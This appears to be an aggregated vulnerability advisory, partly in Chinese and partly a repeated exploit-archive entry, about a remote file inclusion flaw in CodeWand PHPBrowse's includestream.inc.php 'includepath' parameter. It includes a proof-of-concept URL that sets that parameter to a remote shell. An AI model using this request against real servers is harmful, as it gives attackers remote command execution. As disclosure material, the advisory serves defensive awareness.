CodeWand PHPBrowse Include_Stream.Inc.PHP远程文件包含漏洞

CodeWand PHPBrowse是一款基于PHP的WEB应用程序。 CodeWand PHPBrowse不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'IncludeStream.Inc.PHP'脚本对用户提交的'includepath'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 CodeWand phpBrowse 目前没有解决方案提供： http://www.codewand.org/phpBrowse.php...

CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability

PhpBrowse Found by kezzap66345 Script: http://www.codewand.org/download/phpBrowse.tar.gz ERROR: /include/includestream.inc.php include$includepath . "style.inc.php"; rfi coded RFI: http://SITE.com/path/include/includestream.inc.php?includepath=SHELL kezzap66345athotmaildotcom...

CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability

No description provided by source. PhpBrowse Found by kezzap66345 Script: http://www.codewand.org/download/phpBrowse.tar.gz ERROR: /include/includestream.inc.php include$includepath . "style.inc.php"; rfi coded RFI: http://SITE.com/path/include/includestream.inc.php?includepath=SHELL...